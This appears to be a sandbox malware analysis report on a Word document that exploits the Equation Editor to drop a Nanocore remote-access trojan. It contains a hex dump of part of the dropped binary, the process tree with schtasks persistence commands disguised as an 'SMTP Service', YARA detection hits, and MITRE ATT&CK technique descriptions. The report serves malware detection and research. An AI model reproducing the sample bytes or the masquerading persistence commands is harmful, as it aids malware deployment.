72 5b 00 00 70 28 16 00 00 0a 2d 2e 02 7b 0f 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2d 17 02 7b 0e 00 00 04 6f 15 00 00 0a 72 5b 00 00 70 28 16 00 00 0a 2b 01 17 13 04 11 04 2c 11 00 72 5d 00 00 70 28 17 00 00 0a 26 38 b2 00 00 00 02 7b 01 00 00 04 73 18 00 00 0a 0a 1f 0b 8d 3d 00 00 01 25 16 72 79 00 00 70 a2 25 17 02 7b 11 00 00 04 6f 15 00 00 0a a2 25 18 72 10 01 00 70 a2 25 19 02 7b 10 00 00 04 6f 15 00 00 0a a2 25 1a 72 10 01 00 70 a2 25 1b 02 7b 0e 00 00 04 6f 15 00 00 0a a2 25 1c 72 10 01 00 70 a2 25 1d 02 7b 0f 00 00 04 6f 15 00 00 0a a2 25 1e 72 10 01 00 70 a2 25 1f 09 02 7b 0d 00 00 04 6f 15 00 00 0a a2 25 1f 0a 72 18 01 00 70 a2 28 19 00 00 0a 0b 07 06 73 1a 00 00 0a 0c 06 6f 1b 00 00 0a 00 08 6f 1c 00 00 0a 0d 72 1e 01 00 70 28 17 00 00 0a 26 2a 2a 00 02 17 28 1d 00 00 0a 00 2a 0a 00 2a 00 00 00 13 30 02 00 2b 00 00 00 02 00 00 11 00 03 2c 0b 02 7b 02 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 02 00 00 04 6f 1e 00 00 0a 00 00 02 03 28 1f 00 00 0a 00 2a 00 13 30 06 00 4e 0b 00 00 03 00 00 11 00 d0 02 00 00 02 28 20 00 00 0a 73 21 00 00 0a 0a 02 73 22 00 00 0a 7d 03 00 00 04 02 73 22 00 00 0a 7d 04 00 00 04 02 73 23 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELj`02Q `@ @pQO`8P H.text1 2 `.rsrc`4@@.reloc:@BQHkxrp}}((0?{or[p(-\{or[p(-E{or[p(-.{or[p(-{or[p(+,r]p(&8{s=%ryp%{o%rp%{o%rp%{o%rp%{o%rp%{o%rp(soorp(&(0+,{+,{o(0N( s!s"}s"}s#

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1464 Parent PID: 584

General

Start time:	07:47:35
Start date:	09/06/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f370000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2352 Parent PID: 584

General

Start time:	07:47:36
Start date:	09/06/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cat464923.exe PID: 2668 Parent PID: 2352

General

Start time:	07:47:37
Start date:	09/06/2021
Path:	C:\Users\user\AppData\Roaming\cat464923.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\cat464923.exe
Imagebase:	0x8d0000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2090289398.000000000240A000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2091457817.0000000003585000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low

Analysis Process: cat464923.exe PID: 2324 Parent PID: 2668

General

Start time:	07:47:41
Start date:	09/06/2021
Path:	C:\Users\user\AppData\Roaming\cat464923.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x8d0000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2347454023.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2348105483.0000000002491000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000000.2088911305.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2347482313.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2351063180.00000000034D9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: schtasks.exe PID: 2800 Parent PID: 2324

General

Start time:	07:47:43
Start date:	09/06/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp60E5.tmp'
Imagebase:	0x810000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: schtasks.exe PID: 2988 Parent PID: 2324

General

Start time:	07:47:44
Start date:	09/06/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp4F5A.tmp'
Imagebase:	0x490000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskeng.exe PID: 2904 Parent PID: 860

General

Start time:	07:47:44
Start date:	09/06/2021
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {C1636649-2706-44BF-BD6B-15CC427FB25D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff3a0000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cat464923.exe PID: 2468 Parent PID: 2904

General

Start time:	07:47:45
Start date:	09/06/2021
Path:	C:\Users\user\AppData\Roaming\cat464923.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\cat464923.exe 0
Imagebase:	0x8d0000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.2213146011.00000000033E5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000002.2211026677.000000000226A000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: smtpsvc.exe PID: 2416 Parent PID: 2904

General

Start time:	07:47:46
Start date:	09/06/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Imagebase:	0x90000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000C.00000002.2206312034.00000000020DC000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low

Analysis Process: smtpsvc.exe PID: 2252 Parent PID: 1388

General

Start time:	07:47:54
Start date:	09/06/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Imagebase:	0x90000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.2212946414.0000000003525000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000002.2209835071.00000000023AC000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: smtpsvc.exe PID: 1688 Parent PID: 2416

General

Start time:	07:48:08
Start date:	09/06/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x90000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: smtpsvc.exe PID: 2004 Parent PID: 2252

General

Start time:	07:48:08
Start date:	09/06/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x90000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: cat464923.exe PID: 1544 Parent PID: 2468

General

Start time:	07:48:08
Start date:	09/06/2021
Path:	C:\Users\user\AppData\Roaming\cat464923.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x8d0000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000000.2148512830.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.2217963570.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: smtpsvc.exe PID: 2620 Parent PID: 2416

General

Start time:	07:48:09
Start date:	09/06/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x90000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000002.2221684497.0000000003309000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000000.2184659312.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000002.2220476189.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: smtpsvc.exe PID: 2536 Parent PID: 2252

General

Start time:	07:48:09
Start date:	09/06/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x90000
File size:	736256 bytes
MD5 hash:	61DE33A77D34A313DF07DC2BDD28140A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.2220223642.0000000003359000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.2218871109.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

